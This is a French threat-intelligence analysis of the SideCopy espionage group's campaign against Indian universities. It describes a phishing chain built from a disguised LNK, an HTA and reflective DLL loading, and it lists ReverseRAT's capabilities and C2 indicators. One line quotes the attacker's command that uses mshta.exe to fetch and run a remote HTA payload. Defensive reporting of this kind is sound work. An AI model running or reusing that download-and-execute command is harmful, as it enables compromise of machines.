Contexte et cible
Le groupe d'espionnage cybernétique SideCopy, identifié comme TAG‑140 et actif depuis 2019, est originaire du Pakistan. Jusqu'à récemment, ses campagnes visaient principalement les forces de défense et les administrations indiennes. Depuis septembre 2026, les chercheurs de Trellix constatent une extension de la portée vers les établissements d'enseignement supérieur en Inde, marquant une évolution stratégique de leurs priorités de collecte d'information.
Chaîne d'infection
La première étape repose sur un spear‑phishing contenant une archive ZIP. À l'intérieur, un raccourci Windows (.lnk) nommé commskll.docx.lnk possède une icône PDF et une extension .docx afin de tromper l'utilisateur. Ce LNK télécharge un fichier HTA (startT.hta) depuis le domaine docsportal.in et l'exécute via mshta.exe. Le HTA, une fois lancé, charge de façon réflexive une DLL malveillante et supprime immédiatement le fichier HTA pour limiter les traces.
mshta.exe "http://docsportal.in/startT.hta"La DLL agit comme un dropper pour trois composants : appT.bat (déclenché par une clé de registre Run), le second HTA startT.hta contenant le payload final (commskll.docx) et un document factice. Le second HTA reconstruit en mémoire un payload XAML en deux parties, puis charge la DLL ioluegnt.dll.
Mécanismes d'évasion et persistance
SideCopy exploite plusieurs techniques d'évasion : utilisation de mshta.exe pour contourner les contrôles d'exécution, chargement réflexif de DLL pour éviter l'écriture sur disque, et décodage du code malveillant depuis une chaîne Base64 via la désérialisation .NET. La suppression auto‑destructrice du HTA élimine les artefacts sur le disque, rendant difficile l'analyse post‑mortem. La persistance est assurée par l'ajout d'une clé Run dans le registre Windows, garantissant le lancement du batch appT.bat à chaque démarrage.
Capacités du ReverseRAT et risques
Le composant final, nommé ReverseRAT, est présent dans le trafic C2 depuis début 2021. Il chiffre les communications avec la clé fixe NMXIKS09?:709,!~lnsYUS et transmet les données via le port 5863 vers dns.educationportals.biz (IP 45.61.157.22). ReverseRAT collecte métadonnées système, liste des logiciels installés, captures d'écran, mots de passe, contenu du presse‑papier, exécute des commandes, crée des fichiers, et ouvre une session shell. Ces capacités permettent une exfiltration massive d'informations sensibles provenant de la recherche académique, compromettant la confidentialité des projets et des données de recherche.
En combinant une chaîne d'infection multi‑couches, une obfuscation lourde et une persistance robuste, SideCopy demeure une menace adaptable pour la région. La focalisation accrue sur le secteur académique indique une volonté de diversifier les sources d'intelligence, rendant indispensable la mise en place de filtres anti‑phishing renforcés et la surveillance des appels à mshta.exe au sein des réseaux universitaires.